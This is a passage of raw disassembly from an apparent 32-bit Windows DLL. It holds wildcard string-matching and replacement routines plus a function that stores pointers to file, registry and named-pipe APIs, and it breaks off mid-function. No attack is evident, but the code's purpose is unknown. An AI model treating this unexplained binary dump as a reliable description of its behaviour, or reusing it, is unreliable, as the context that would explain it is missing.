jmp short loc_1000F36E
; ---------------------------------------------------------------------------
loc_1000F35D: ; CODE XREF: sub_1000F2AB+A9�j
xor eax, eax
jmp short loc_1000F36E
; ---------------------------------------------------------------------------
loc_1000F361: ; CODE XREF: sub_1000F2AB+A1�j
cmp [ebp+arg_8], 1
jnz short loc_1000F36C
mov eax, [ebp+var_34]
jmp short loc_1000F36E
; ---------------------------------------------------------------------------
loc_1000F36C: ; CODE XREF: sub_1000F2AB+BA�j
xor eax, eax
loc_1000F36E: ; CODE XREF: sub_1000F2AB+31�j
; sub_1000F2AB+B0�j ...
mov esp, ebp
pop ebp
retn
sub_1000F2AB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000F372 proc near ; CODE XREF: sub_100108A3+2D9�p
; sub_100108A3+5D4�p ...
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 18h
mov [ebp+var_10], 0
mov [ebp+var_4], 0
mov [ebp+var_C], 0
mov [ebp+var_8], 0
mov [ebp+var_14], 0
mov [ebp+var_18], 0
loc_1000F3A2: ; CODE XREF: sub_1000F372+88�j
; sub_1000F372+233�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_C]
movsx ecx, byte ptr [eax]
test ecx, ecx
jz loc_1000F5AA
mov edx, [ebp+arg_0]
add edx, [ebp+var_C]
movsx eax, byte ptr [edx]
cmp eax, 21h
jge short loc_1000F3FC
mov ecx, [ebp+arg_C]
add ecx, [ebp+var_8]
mov edx, [ebp+arg_0]
add edx, [ebp+var_C]
mov al, [edx]
mov [ecx], al
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
cmp edx, 21h
jge short loc_1000F3E8
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
loc_1000F3E8: ; CODE XREF: sub_1000F372+6B�j
mov ecx, [ebp+var_C]
add ecx, 1
mov [ebp+var_C], ecx
mov edx, [ebp+var_8]
add edx, 1
mov [ebp+var_8], edx
jmp short loc_1000F3A2
; ---------------------------------------------------------------------------
loc_1000F3FC: ; CODE XREF: sub_1000F372+4D�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_C]
movsx ecx, byte ptr [eax]
test ecx, ecx
jnz short loc_1000F40E
jmp loc_1000F5AA
; ---------------------------------------------------------------------------
loc_1000F40E: ; CODE XREF: sub_1000F372+95�j
mov edx, [ebp+arg_0]
add edx, [ebp+var_C]
movsx eax, byte ptr [edx]
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
cmp eax, edx
jz short loc_1000F44F
mov eax, [ebp+arg_0]
add eax, [ebp+var_C]
movsx ecx, byte ptr [eax]
mov edx, [ebp+arg_4]
add edx, [ebp+var_4]
movsx eax, byte ptr [edx]
sub eax, 20h
cmp ecx, eax
jz short loc_1000F44F
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
cmp edx, 2Ah
jnz loc_1000F56E
loc_1000F44F: ; CODE XREF: sub_1000F372+B0�j
; sub_1000F372+C9�j
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
cmp ecx, 2Ah
jz short loc_1000F466
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
loc_1000F466: ; CODE XREF: sub_1000F372+E9�j
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
cmp ecx, 2Ah
jnz short loc_1000F4EC
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
loc_1000F47D: ; CODE XREF: sub_1000F372+169�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_C]
movsx ecx, byte ptr [eax]
mov edx, [ebp+arg_4]
add edx, [ebp+var_4]
movsx eax, byte ptr [edx]
cmp ecx, eax
jz short loc_1000F4DD
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_C]
movsx edx, byte ptr [ecx]
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
sub ecx, 20h
cmp edx, ecx
jz short loc_1000F4DD
mov edx, [ebp+arg_0]
add edx, [ebp+var_C]
movsx eax, byte ptr [edx]
test eax, eax
jz short loc_1000F4DD
mov ecx, [ebp+arg_C]
add ecx, [ebp+var_8]
mov edx, [ebp+arg_0]
add edx, [ebp+var_C]
mov al, [edx]
mov [ecx], al
mov ecx, [ebp+var_C]
add ecx, 1
mov [ebp+var_C], ecx
mov edx, [ebp+var_8]
add edx, 1
mov [ebp+var_8], edx
jmp short loc_1000F47D
; ---------------------------------------------------------------------------
loc_1000F4DD: ; CODE XREF: sub_1000F372+11F�j
; sub_1000F372+138�j ...
mov eax, [ebp+var_4]
mov [ebp+var_10], eax
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
loc_1000F4EC: ; CODE XREF: sub_1000F372+100�j
mov edx, [ebp+arg_0]
add edx, [ebp+var_C]
movsx eax, byte ptr [edx]
test eax, eax
jnz short loc_1000F4FE
jmp loc_1000F5AA
; ---------------------------------------------------------------------------
loc_1000F4FE: ; CODE XREF: sub_1000F372+185�j
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
test edx, edx
jnz short loc_1000F56C
mov eax, [ebp+arg_C]
add eax, [ebp+var_8]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_C]
mov dl, [ecx]
mov [eax], dl
mov eax, [ebp+var_C]
add eax, 1
mov [ebp+var_C], eax
mov ecx, [ebp+var_8]
add ecx, 1
mov [ebp+var_8], ecx
mov [ebp+var_4], 0
loc_1000F534: ; CODE XREF: sub_1000F372+1F1�j
mov edx, [ebp+arg_8]
add edx, [ebp+var_14]
movsx eax, byte ptr [edx]
test eax, eax
jz short loc_1000F565
mov ecx, [ebp+arg_C]
add ecx, [ebp+var_8]
mov edx, [ebp+arg_8]
add edx, [ebp+var_14]
mov al, [edx]
mov [ecx], al
mov ecx, [ebp+var_8]
add ecx, 1
mov [ebp+var_8], ecx
mov edx, [ebp+var_14]
add edx, 1
mov [ebp+var_14], edx
jmp short loc_1000F534
; ---------------------------------------------------------------------------
loc_1000F565: ; CODE XREF: sub_1000F372+1CD�j
mov [ebp+var_18], 1
loc_1000F56C: ; CODE XREF: sub_1000F372+197�j
jmp short loc_1000F583
; ---------------------------------------------------------------------------
loc_1000F56E: ; CODE XREF: sub_1000F372+D7�j
cmp [ebp+var_10], 0
jz short loc_1000F57C
mov eax, [ebp+var_10]
mov [ebp+var_4], eax
jmp short loc_1000F583
; ---------------------------------------------------------------------------
loc_1000F57C: ; CODE XREF: sub_1000F372+200�j
mov [ebp+var_4], 0
loc_1000F583: ; CODE XREF: sub_1000F372:loc_1000F56C�j
; sub_1000F372+208�j
mov ecx, [ebp+arg_C]
add ecx, [ebp+var_8]
mov edx, [ebp+arg_0]
add edx, [ebp+var_C]
mov al, [edx]
mov [ecx], al
mov ecx, [ebp+var_8]
add ecx, 1
mov [ebp+var_8], ecx
mov edx, [ebp+var_C]
add edx, 1
mov [ebp+var_C], edx
jmp loc_1000F3A2
; ---------------------------------------------------------------------------
loc_1000F5AA: ; CODE XREF: sub_1000F372+3B�j
; sub_1000F372+97�j ...
mov eax, [ebp+var_18]
mov esp, ebp
pop ebp
retn
sub_1000F372 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000F5B1 proc near ; CODE XREF: sub_100108A3+32D�p
; sub_100108A3+747�p ...
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 1Ch
mov [ebp+var_4], 0
mov [ebp+var_14], 0
mov [ebp+var_8], 0
mov [ebp+var_10], 0
mov [ebp+var_C], 0
mov [ebp+var_18], 0
mov [ebp+var_1C], 0
loc_1000F5E8: ; CODE XREF: sub_1000F5B1+8F�j
; sub_1000F5B1+241�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_10]
movsx ecx, byte ptr [eax]
test ecx, ecx
jz loc_1000F7F7
mov edx, [ebp+arg_0]
add edx, [ebp+var_10]
movsx eax, byte ptr [edx]
cmp eax, 21h
jge short loc_1000F642
mov ecx, [ebp+arg_C]
add ecx, [ebp+var_C]
mov edx, [ebp+arg_0]
add edx, [ebp+var_10]
mov al, [edx]
mov [ecx], al
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_8]
movsx edx, byte ptr [ecx]
cmp edx, 21h
jge short loc_1000F62E
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
loc_1000F62E: ; CODE XREF: sub_1000F5B1+72�j
mov ecx, [ebp+var_10]
add ecx, 1
mov [ebp+var_10], ecx
mov edx, [ebp+var_C]
add edx, 1
mov [ebp+var_C], edx
jmp short loc_1000F5E8
; ---------------------------------------------------------------------------
loc_1000F642: ; CODE XREF: sub_1000F5B1+54�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_10]
movsx ecx, byte ptr [eax]
test ecx, ecx
jnz short loc_1000F654
jmp loc_1000F7F7
; ---------------------------------------------------------------------------
loc_1000F654: ; CODE XREF: sub_1000F5B1+9C�j
mov edx, [ebp+arg_0]
add edx, [ebp+var_10]
movsx eax, byte ptr [edx]
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_8]
movsx edx, byte ptr [ecx]
cmp eax, edx
jz short loc_1000F6B0
mov eax, [ebp+arg_0]
add eax, [ebp+var_10]
movsx ecx, byte ptr [eax]
mov edx, [ebp+arg_4]
add edx, [ebp+var_8]
movsx eax, byte ptr [edx]
sub eax, 20h
cmp ecx, eax
jz short loc_1000F6B0
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_10]
movsx edx, byte ptr [ecx]
push edx ; C
call ds:isdigit ; isdigit
add esp, 4
test eax, eax
jz loc_1000F7B4
mov eax, [ebp+arg_4]
add eax, [ebp+var_8]
movsx ecx, byte ptr [eax]
cmp ecx, 23h
jnz loc_1000F7B4
loc_1000F6B0: ; CODE XREF: sub_1000F5B1+B7�j
; sub_1000F5B1+D0�j
cmp [ebp+var_4], 0
jnz short loc_1000F6BC
mov edx, [ebp+var_C]
mov [ebp+var_4], edx
loc_1000F6BC: ; CODE XREF: sub_1000F5B1+103�j
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_8]
movsx edx, byte ptr [ecx]
cmp edx, 2Ah
jnz short loc_1000F72E
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_8]
push ecx ; SubStr
mov edx, [ebp+arg_0]
add edx, [ebp+var_10]
push edx ; Str
call ds:strstr ; strstr
add esp, 8
test eax, eax
jz short loc_1000F716
mov eax, [ebp+arg_4]
add eax, [ebp+var_8]
push eax ; SubStr
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_10]
push ecx ; Str
call ds:strstr ; strstr
add esp, 8
sub eax, [ebp+arg_0]
mov [ebp+var_10], eax
jmp short loc_1000F71F
; ---------------------------------------------------------------------------
loc_1000F716: ; CODE XREF: sub_1000F5B1+144�j
mov edx, [ebp+var_10]
add edx, 1
mov [ebp+var_10], edx
loc_1000F71F: ; CODE XREF: sub_1000F5B1+163�j
mov eax, [ebp+var_8]
mov [ebp+var_14], eax
mov ecx, [ebp+var_8]
add ecx, 1
mov [ebp+var_8], ecx
loc_1000F72E: ; CODE XREF: sub_1000F5B1+120�j
mov edx, [ebp+arg_0]
add edx, [ebp+var_10]
movsx eax, byte ptr [edx]
test eax, eax
jnz short loc_1000F740
jmp loc_1000F7F7
; ---------------------------------------------------------------------------
loc_1000F740: ; CODE XREF: sub_1000F5B1+188�j
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_8]
movsx edx, byte ptr [ecx]
test edx, edx
jnz short loc_1000F7B2
mov [ebp+var_8], 0
mov eax, [ebp+var_4]
mov [ebp+var_C], eax
mov [ebp+var_4], 0
loc_1000F761: ; CODE XREF: sub_1000F5B1+1DF�j
mov ecx, [ebp+arg_8]
add ecx, [ebp+var_18]
movsx edx, byte ptr [ecx]
test edx, edx
jz short loc_1000F792
mov eax, [ebp+arg_C]
add eax, [ebp+var_C]
mov ecx, [ebp+arg_8]
add ecx, [ebp+var_18]
mov dl, [ecx]
mov [eax], dl
mov eax, [ebp+var_C]
add eax, 1
mov [ebp+var_C], eax
mov ecx, [ebp+var_18]
add ecx, 1
mov [ebp+var_18], ecx
jmp short loc_1000F761
; ---------------------------------------------------------------------------
loc_1000F792: ; CODE XREF: sub_1000F5B1+1BB�j
mov [ebp+var_18], 0
mov [ebp+var_14], 0
mov edx, [ebp+var_10]
add edx, 1
mov [ebp+var_10], edx
mov eax, [ebp+var_1C]
add eax, 1
mov [ebp+var_1C], eax
loc_1000F7B2: ; CODE XREF: sub_1000F5B1+19A�j
jmp short loc_1000F7D0
; ---------------------------------------------------------------------------
loc_1000F7B4: ; CODE XREF: sub_1000F5B1+E7�j
; sub_1000F5B1+F9�j
cmp [ebp+var_14], 0
jz short loc_1000F7C2
mov ecx, [ebp+var_14]
mov [ebp+var_8], ecx
jmp short loc_1000F7C9
; ---------------------------------------------------------------------------
loc_1000F7C2: ; CODE XREF: sub_1000F5B1+207�j
mov [ebp+var_8], 0
loc_1000F7C9: ; CODE XREF: sub_1000F5B1+20F�j
mov [ebp+var_4], 0
loc_1000F7D0: ; CODE XREF: sub_1000F5B1:loc_1000F7B2�j
mov edx, [ebp+arg_C]
add edx, [ebp+var_C]
mov eax, [ebp+arg_0]
add eax, [ebp+var_10]
mov cl, [eax]
mov [edx], cl
mov edx, [ebp+var_C]
add edx, 1
mov [ebp+var_C], edx
mov eax, [ebp+var_10]
add eax, 1
mov [ebp+var_10], eax
jmp loc_1000F5E8
; ---------------------------------------------------------------------------
loc_1000F7F7: ; CODE XREF: sub_1000F5B1+42�j
; sub_1000F5B1+9E�j ...
mov eax, [ebp+var_1C]
mov esp, ebp
pop ebp
retn
sub_1000F5B1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000F7FE proc near ; CODE XREF: sub_100108A3+52E�p
; sub_10011167+561�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 28h
mov [ebp+var_24], 0
mov [ebp+var_28], 0
mov [ebp+var_14], 0
mov [ebp+var_10], 0
mov [ebp+var_8], 0
mov [ebp+var_20], 0
mov [ebp+var_1C], 0
mov [ebp+var_18], 0
mov [ebp+var_C], 0
loc_1000F843: ; CODE XREF: sub_1000F7FE:loc_1000FB05�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_20]
movsx ecx, byte ptr [eax]
test ecx, ecx
jz loc_1000FB0A
mov edx, [ebp+arg_0]
add edx, [ebp+var_20]
movsx eax, byte ptr [edx]
test eax, eax
jnz short loc_1000F866
jmp loc_1000FB0A
; ---------------------------------------------------------------------------
loc_1000F866: ; CODE XREF: sub_1000F7FE+61�j
cmp [ebp+var_C], 0
jnz loc_1000F9BC
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_20]
movsx edx, byte ptr [ecx]
mov eax, [ebp+arg_4]
add eax, [ebp+var_10]
movsx ecx, byte ptr [eax]
cmp edx, ecx
jz short loc_1000F8A3
mov edx, [ebp+arg_0]
add edx, [ebp+var_20]
movsx eax, byte ptr [edx]
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_10]
movsx edx, byte ptr [ecx]
sub edx, 20h
cmp eax, edx
jnz loc_1000F992
loc_1000F8A3: ; CODE XREF: sub_1000F7FE+86�j
mov eax, [ebp+var_10]
add eax, 1
mov [ebp+var_10], eax
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_10]
movsx edx, byte ptr [ecx]
cmp edx, 2Ah
jnz loc_1000F94B
mov eax, [ebp+var_10]
add eax, 1
mov [ebp+var_10], eax
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_10]
push ecx ; SubStr
mov edx, [ebp+arg_0]
add edx, [ebp+var_20]
push edx ; Str
call ds:strstr ; strstr
add esp, 8
test eax, eax
jz short loc_1000F933
mov eax, [ebp+arg_4]
add eax, [ebp+var_10]
push eax ; SubStr
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_20]
push ecx ; Str
call ds:strstr ; strstr
add esp, 8
sub eax, [ebp+arg_0]
mov [ebp+var_4], eax
mov edx, [ebp+var_4]
sub edx, [ebp+var_20]
push edx ; Count
mov eax, [ebp+arg_0]
add eax, [ebp+var_20]
push eax ; Source
mov ecx, [ebp+arg_C]
add ecx, [ebp+var_1C]
push ecx ; Dest
call ds:strncat ; strncat
add esp, 0Ch
mov edx, [ebp+var_4]
sub edx, [ebp+var_20]
mov eax, [ebp+var_1C]
add eax, edx
mov [ebp+var_1C], eax
mov ecx, [ebp+var_4]
mov [ebp+var_20], ecx
jmp short loc_1000F93C
; ---------------------------------------------------------------------------
loc_1000F933: ; CODE XREF: sub_1000F7FE+E2�j
mov edx, [ebp+var_20]
add edx, 1
mov [ebp+var_20], edx
loc_1000F93C: ; CODE XREF: sub_1000F7FE+133�j
mov eax, [ebp+var_10]
mov [ebp+var_24], eax
mov ecx, [ebp+var_10]
add ecx, 1
mov [ebp+var_10], ecx
loc_1000F94B: ; CODE XREF: sub_1000F7FE+BA�j
mov edx, [ebp+arg_0]
add edx, [ebp+var_20]
movsx eax, byte ptr [edx]
test eax, eax
jnz short loc_1000F95D
jmp loc_1000FB0A
; ---------------------------------------------------------------------------
loc_1000F95D: ; CODE XREF: sub_1000F7FE+158�j
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_10]
movsx edx, byte ptr [ecx]
test edx, edx
jnz short loc_1000F977
mov [ebp+var_C], 1
mov eax, [ebp+var_1C]
mov [ebp+var_14], eax
loc_1000F977: ; CODE XREF: sub_1000F7FE+16A�j
mov ecx, [ebp+arg_C]
add ecx, [ebp+var_1C]
mov edx, [ebp+arg_0]
add edx, [ebp+var_20]
mov al, [edx]
mov [ecx], al
mov ecx, [ebp+var_1C]
add ecx, 1
mov [ebp+var_1C], ecx
jmp short loc_1000F9AE
; ---------------------------------------------------------------------------
loc_1000F992: ; CODE XREF: sub_1000F7FE+9F�j
cmp [ebp+var_24], 0
jz short loc_1000F9A0
mov edx, [ebp+var_24]
mov [ebp+var_10], edx
jmp short loc_1000F9A7
; ---------------------------------------------------------------------------
loc_1000F9A0: ; CODE XREF: sub_1000F7FE+198�j
mov [ebp+var_10], 0
loc_1000F9A7: ; CODE XREF: sub_1000F7FE+1A0�j
mov [ebp+var_1C], 0
loc_1000F9AE: ; CODE XREF: sub_1000F7FE+192�j
mov eax, [ebp+var_20]
add eax, 1
mov [ebp+var_20], eax
jmp loc_1000FB05
; ---------------------------------------------------------------------------
loc_1000F9BC: ; CODE XREF: sub_1000F7FE+6C�j
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_20]
movsx edx, byte ptr [ecx]
mov eax, [ebp+arg_8]
add eax, [ebp+var_8]
movsx ecx, byte ptr [eax]
cmp edx, ecx
jz short loc_1000F9EF
mov edx, [ebp+arg_0]
add edx, [ebp+var_20]
movsx eax, byte ptr [edx]
mov ecx, [ebp+arg_8]
add ecx, [ebp+var_8]
movsx edx, byte ptr [ecx]
sub edx, 20h
cmp eax, edx
jnz loc_1000FACE
loc_1000F9EF: ; CODE XREF: sub_1000F7FE+1D2�j
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
mov ecx, [ebp+arg_8]
add ecx, [ebp+var_8]
movsx edx, byte ptr [ecx]
cmp edx, 2Ah
jnz loc_1000FA97
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
mov ecx, [ebp+arg_8]
add ecx, [ebp+var_8]
push ecx ; SubStr
mov edx, [ebp+arg_0]
add edx, [ebp+var_20]
push edx ; Str
call ds:strstr ; strstr
add esp, 8
test eax, eax
jz short loc_1000FA7F
mov eax, [ebp+arg_8]
add eax, [ebp+var_8]
push eax ; SubStr
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_20]
push ecx ; Str
call ds:strstr ; strstr
add esp, 8
sub eax, [ebp+arg_0]
mov [ebp+var_4], eax
mov edx, [ebp+var_4]
sub edx, [ebp+var_20]
push edx ; Count
mov eax, [ebp+arg_0]
add eax, [ebp+var_20]
push eax ; Source
mov ecx, [ebp+arg_C]
add ecx, [ebp+var_1C]
push ecx ; Dest
call ds:strncat ; strncat
add esp, 0Ch
mov edx, [ebp+var_4]
sub edx, [ebp+var_20]
mov eax, [ebp+var_1C]
add eax, edx
mov [ebp+var_1C], eax
mov ecx, [ebp+var_4]
mov [ebp+var_20], ecx
jmp short loc_1000FA88
; ---------------------------------------------------------------------------
loc_1000FA7F: ; CODE XREF: sub_1000F7FE+22E�j
mov edx, [ebp+var_20]
add edx, 1
mov [ebp+var_20], edx
loc_1000FA88: ; CODE XREF: sub_1000F7FE+27F�j
mov eax, [ebp+var_8]
mov [ebp+var_28], eax
mov ecx, [ebp+var_8]
add ecx, 1
mov [ebp+var_8], ecx
loc_1000FA97: ; CODE XREF: sub_1000F7FE+206�j
mov edx, [ebp+arg_0]
add edx, [ebp+var_20]
movsx eax, byte ptr [edx]
test eax, eax
jz short loc_1000FAB1
mov ecx, [ebp+arg_8]
add ecx, [ebp+var_8]
movsx edx, byte ptr [ecx]
test edx, edx
jnz short loc_1000FACC
loc_1000FAB1: ; CODE XREF: sub_1000F7FE+2A4�j
mov eax, [ebp+arg_C]
add eax, [ebp+var_1C]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_20]
mov dl, [ecx]
mov [eax], dl
mov eax, [ebp+var_18]
add eax, 1
mov [ebp+var_18], eax
jmp short loc_1000FB0A
; ---------------------------------------------------------------------------
loc_1000FACC: ; CODE XREF: sub_1000F7FE+2B1�j
jmp short loc_1000FAE3
; ---------------------------------------------------------------------------
loc_1000FACE: ; CODE XREF: sub_1000F7FE+1EB�j
cmp [ebp+var_28], 0
jz short loc_1000FADC
mov ecx, [ebp+var_28]
mov [ebp+var_8], ecx
jmp short loc_1000FAE3
; ---------------------------------------------------------------------------
loc_1000FADC: ; CODE XREF: sub_1000F7FE+2D4�j
mov [ebp+var_8], 0
loc_1000FAE3: ; CODE XREF: sub_1000F7FE:loc_1000FACC�j
; sub_1000F7FE+2DC�j
mov edx, [ebp+arg_C]
add edx, [ebp+var_1C]
mov eax, [ebp+arg_0]
add eax, [ebp+var_20]
mov cl, [eax]
mov [edx], cl
mov edx, [ebp+var_1C]
add edx, 1
mov [ebp+var_1C], edx
mov eax, [ebp+var_20]
add eax, 1
mov [ebp+var_20], eax
loc_1000FB05: ; CODE XREF: sub_1000F7FE+1B9�j
jmp loc_1000F843
; ---------------------------------------------------------------------------
loc_1000FB0A: ; CODE XREF: sub_1000F7FE+50�j
; sub_1000F7FE+63�j ...
mov eax, [ebp+var_18]
mov esp, ebp
pop ebp
retn
sub_1000F7FE endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+8]
mov [ebp-4], eax
loc_1000FB1B: ; CODE XREF: .text:1000FB2E�j
mov ecx, [ebp+8]
movsx edx, byte ptr [ecx]
test edx, edx
jz short loc_1000FB30
mov eax, [ebp+8]
add eax, 1
mov [ebp+8], eax
jmp short loc_1000FB1B
; ---------------------------------------------------------------------------
loc_1000FB30: ; CODE XREF: .text:1000FB23�j
; .text:1000FB89�j
mov ecx, [ebp+8]
cmp ecx, [ebp-4]
jbe short loc_1000FB8B
mov edx, [ebp+8]
movsx eax, byte ptr [edx-1]
cmp eax, 41h
jl short loc_1000FB50
mov ecx, [ebp+8]
movsx edx, byte ptr [ecx-1]
cmp edx, 5Ah
jle short loc_1000FB80
loc_1000FB50: ; CODE XREF: .text:1000FB42�j
mov eax, [ebp+8]
movsx ecx, byte ptr [eax-1]
cmp ecx, 61h
jl short loc_1000FB68
mov edx, [ebp+8]
movsx eax, byte ptr [edx-1]
cmp eax, 7Ah
jle short loc_1000FB80
loc_1000FB68: ; CODE XREF: .text:1000FB5A�j
mov ecx, [ebp+8]
movsx edx, byte ptr [ecx-1]
cmp edx, 30h
jl short loc_1000FB8B
mov eax, [ebp+8]
movsx ecx, byte ptr [eax-1]
cmp ecx, 39h
jg short loc_1000FB8B
loc_1000FB80: ; CODE XREF: .text:1000FB4E�j
; .text:1000FB66�j
mov edx, [ebp+8]
sub edx, 1
mov [ebp+8], edx
jmp short loc_1000FB30
; ---------------------------------------------------------------------------
loc_1000FB8B: ; CODE XREF: .text:1000FB36�j
; .text:1000FB72�j ...
mov eax, [ebp+8]
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000FB92 proc near ; CODE XREF: sub_1001338E+23�p
; sub_1001338E+3A�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_10017B24
mov [ebp+var_4], eax
mov esp, ebp
pop ebp
retn
sub_1000FB92 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_1000FBAA(int, LPCVOID lpAddress)
sub_1000FBAA proc near ; CODE XREF: sub_100134D4+23�p
; sub_100134D4+3A�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
lpAddress = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+lpAddress]
push eax ; lpAddress
mov ecx, [ebp+arg_0]
push ecx ; int
call sub_10018059
mov [ebp+var_4], eax
mov esp, ebp
pop ebp
retn
sub_1000FBAA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000FBC2 proc near ; DATA XREF: .data:10022010�o
push ebp
mov ebp, esp
call sub_1000FBCC
pop ebp
retn
sub_1000FBC2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000FBCC proc near ; CODE XREF: sub_1000FBC2+3�p
push ebp
mov ebp, esp
mov eax, ds:RegEnumValueW
mov dword_10073DAC, eax
mov ecx, dword_10073DAC
mov dword_10073DAC, ecx
mov edx, dword_10073DE0
mov dword_10073B90, edx
mov eax, ds:CreateFileW
mov dword_10073A48, eax
mov ecx, dword_10073A48
mov dword_10073A48, ecx
mov edx, ds:WriteFile
mov dword_10073A50, edx
mov eax, dword_10073A50
mov dword_10073A50, eax
mov ecx, ds:FlushFileBuffers
mov dword_10073B6C, ecx
mov edx, dword_10073B6C
mov dword_10073B6C, edx
mov eax, ds:CloseHandle
mov dword_10073B84, eax
mov ecx, dword_10073B84
mov dword_10073B84, ecx
mov edx, ds:WaitNamedPipeW
mov dword_10073DA4, edx
mov eax, dword_10073DA4
mov dword_10073DA4, eax
mov ecx, ds:SetNamedPipeHandleState
mov dword_10073B64, ecx
mov edx, dword_10073B64
mov dword_10073B64, edx
mov eax, ds:GetCurrentProcessId
mov dword_10073DB4, eax
mov ecx, dword_10073DB4
mov dword_10073DB4, ecx
mov edx, ds:GetSystemTimeAsFileTime
mov dword_10073B7C, edx
mov eax, dword_10073B7C
mov dword_10073B7C, eax
mov ecx, ds:InitializeCriticalSection
mov dword_10073B5C, ecx
mov edx, dword_10073B5C
mov dword_10073B5C, edx
mov eax, ds:EnterCriticalSection
mov dword_10073DB0, eax
mov ecx, dword_10073DB0
mov dword_10073DB0, ecx
mov edx, ds:LeaveCriticalSection
mov dword_10073A54, edx
mov eax, dword_10073A54
mov dword_10073A54, eax
pop ebp
retn
sub_1000FBCC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_1000FCEB(int, int, LPCWSTR lpWideCharStr, int, int, int, int, int)
sub_1000FCEB proc near ; DATA XREF: sub_1001338E+FF�o
; sub_100134D4+FF�o
var_E4 = dword ptr -0E4h
Str1 = byte ptr -0E0h
var_DF = byte ptr -0DFh
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
lpWideCharStr = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
; FUNCTION CHUNK AT 1000FDB8 SIZE 00000019 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_1001E478
push offset loc_10017470
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFF2Ch
push ebx
push esi
push edi
mov [ebp+var_E4], 0
mov [ebp+Str1], 0
mov ecx, 31h
xor eax, eax
lea edi, [ebp+var_DF]
rep stosd
stosw
stosb
mov [ebp+var_4], 0
mov eax, [ebp+arg_1C]
push eax
mov ecx, [ebp+arg_18]
push ecx
mov edx, [ebp+arg_14]
push edx
mov eax, [ebp+arg_10]
push eax
mov ecx, [ebp+arg_C]
push ecx
